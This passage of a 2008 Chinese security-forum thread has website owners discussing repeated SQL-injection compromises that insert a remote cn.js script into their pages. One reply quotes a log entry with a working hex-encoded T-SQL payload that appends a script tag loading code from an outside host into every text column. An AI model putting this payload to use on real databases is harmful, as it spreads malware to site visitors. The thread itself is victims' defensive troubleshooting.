瑞星卡卡安全论坛技术交流区入侵防御(HIPS) 求助!被http://cn.daxia123.cn/cn.js入侵或者是病毒、攻击

12345678»   2  /  9  页   跳转

求助!被http://cn.daxia123.cn/cn.js入侵或者是病毒、攻击

收藏
daveeyang
头像
初生襁褓狮
  • 帖子:8
  • 注册: 2008-07-28
  • 来自:
发表于: 2008-12-26 21:52 | 短消息 资料
字号: 11楼

回复:求助!被http://cn.daxia123.cn/cn.js入侵

我用瑞星全盘杀毒,也用360扫描了,没发现病毒,我早前些挨过一次,恢复了之后,从昨天下午(12月25日)开始又中,还原数据库之后,过了不到半个小时又中了。
我总结一下我的情况:
我的网站用了sqlserver数据库、IIS、用了ISAPI_Rewrite路径重写(用不会有漏洞?),网站是自己开发的,做了关键字处理,论坛用了动网(php+mysql)论坛。
大家总结一下啊....
最后编辑daveeyang 最后编辑于 2008-12-26 21:57:21
gototop
 
bestjia
头像
初生襁褓狮
  • 帖子:6
  • 注册: 2008-12-26
  • 来自:
发表于: 2008-12-26 21:53 | 短消息 资料
字号: 12楼

回复:求助!被http://cn.daxia123.cn/cn.js入侵

还想问一下,大家是不是都是在12月24号开始的啊,我的是12月24号下午3点11分发现的

加了一些反注入的代码,还是无济于事
gototop
 
daveeyang
头像
初生襁褓狮
  • 帖子:8
  • 注册: 2008-07-28
  • 来自:
发表于: 2008-12-26 22:30 | 短消息 资料
字号: 13楼

回复:求助!被http://cn.daxia123.cn/cn.js入侵或者是病毒、攻击

我的网站现在被迫关闭了...痛苦....
猜测会不会是通过sql注入式攻击,但我们的代码已经进行防水处理了,不知道是从哪儿攻击网站的,大家多讨论讨论!
gototop
 
bestjia
头像
初生襁褓狮
  • 帖子:6
  • 注册: 2008-12-26
  • 来自:
发表于: 2008-12-26 22:36 | 短消息 资料
字号: 14楼

回复:求助!被http://cn.daxia123.cn/cn.js入侵或者是病毒、攻击

是啊,大家多多关注此帖子吧,顶上去,看看还有没有和我们遭遇相同的网站
gototop
 
daveeyang
头像
初生襁褓狮
  • 帖子:8
  • 注册: 2008-07-28
  • 来自:
发表于: 2008-12-26 23:16 | 短消息 资料
字号: 15楼

回复:求助!被http://cn.daxia123.cn/cn.js入侵或者是病毒、攻击

目前发现一个问题了,是注入式攻击,通过对访问日志的查看,终于发现了访问有问题,来自IP-121.42.214.238(河北省邯郸市)的访问里面,有一段:
GET /news/more.asp classid=18;dEcLaRe%20@S%20VaRcHaR(4000)%20SeT%20@s=cAsT(0x4445434C415245204054205641524348415228323535292C404320564152434841522832353529204445434C415245205461626C655F437572736F7220435552534F5220464F522053454C45435420612E6E616D652C622E6E616D652046524F4D207379736F626A6563747320612C737973636F6C756D6E73206220574845524520612E69643D622E696420414E4420612E78747970653D27752720414E442028622E78747970653D3939204F5220622E78747970653D3335204F5220622E78747970653D323331204F5220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20455845432827555044415445205B272B40542B275D20534554205B272B40432B275D3D525452494D28434F4E5645525428564152434841522834303030292C5B272B40432B275D29292B27273C736372697074207372633D687474703A2F2F636E2E6A786D6D74762E636F6D2F636E2E6A733E3C2F7363726970743E27272729204645544348204E4558542046524F4D205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72%20aS%20VaRcHaR(4000));eXeC(@s);-- 80 - 121.42.214.238 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.0) 404 0 3
里面明显地有注入的攻击代码。我猜想会不会是这个引起的病毒,而这一访问也和我的网站中病毒时间吻合,所以强烈建议大家检查你的网站,是不是对程序进行过防水处理了!
gototop
 
niuniu123niuniu
头像
初生襁褓狮
  • 帖子:1
  • 注册: 2008-12-26
  • 来自:
发表于: 2008-12-26 23:20 | 短消息 资料
字号: 16楼

回复:求助!被http://cn.daxia123.cn/cn.js入侵或者是病毒、攻击

做了防水处理,还有中招的。。。
http://bbs.360safe.com/viewthread.php?tid=606369&extra=page%3D1&page=1
这里也有好多中招的
gototop
 
daveeyang
头像
初生襁褓狮
  • 帖子:8
  • 注册: 2008-07-28
  • 来自:
发表于: 2008-12-26 23:30 | 短消息 资料
字号: 17楼

回复:求助!被http://cn.daxia123.cn/cn.js入侵或者是病毒、攻击

到目前为止,在系统没有病毒、没有漏洞的情况下,初步估计就是注入式攻击了。。。
我看日志里面,有大量的注入式访问记录,这些黑客估计就要一个页面一个页面地去尝试,网站只要有一个漏洞,就完了。。。。
gototop
 
bestjia
头像
初生襁褓狮
  • 帖子:6
  • 注册: 2008-12-26
  • 来自:
发表于: 2008-12-26 23:33 | 短消息 资料
字号: 18楼

回复:求助!被http://cn.daxia123.cn/cn.js入侵或者是病毒、攻击

最新的发现,又有了一个注入在进行  之前是cn.daxia123.cn,现在又出来了一个叫  cn.jxmmtv.com
gototop
 
bestjia
头像
初生襁褓狮
  • 帖子:6
  • 注册: 2008-12-26
  • 来自:
发表于: 2008-12-27 00:13 | 短消息 资料
字号: 19楼

回复:求助!被http://cn.daxia123.cn/cn.js入侵或者是病毒、攻击

不知道大家有没有外挂统计,有的话先在页面上去掉吧,我现在把统计都去掉了,如果再出问题真不知道怎么解决了,从昨天到现在,我把网站所有的页面都从新排查了一下,都做了反注入,但是今天没管用,现在能想到的只有统计没去掉了,大家试试,我希望能行,我也在观察行不行呢
gototop
 
bestjia
头像
初生襁褓狮
  • 帖子:6
  • 注册: 2008-12-26
  • 来自:
发表于: 2008-12-27 00:25 | 短消息 资料
字号: 20楼

回复:求助!被http://cn.daxia123.cn/cn.js入侵或者是病毒、攻击

看来跟统计也没有关系,不管用,刚刚又出现问题了
gototop
 
<<上一主题|下一主题>>
12345678»   2  /  9  页   跳转
页面顶部
Powered by Discuz!NT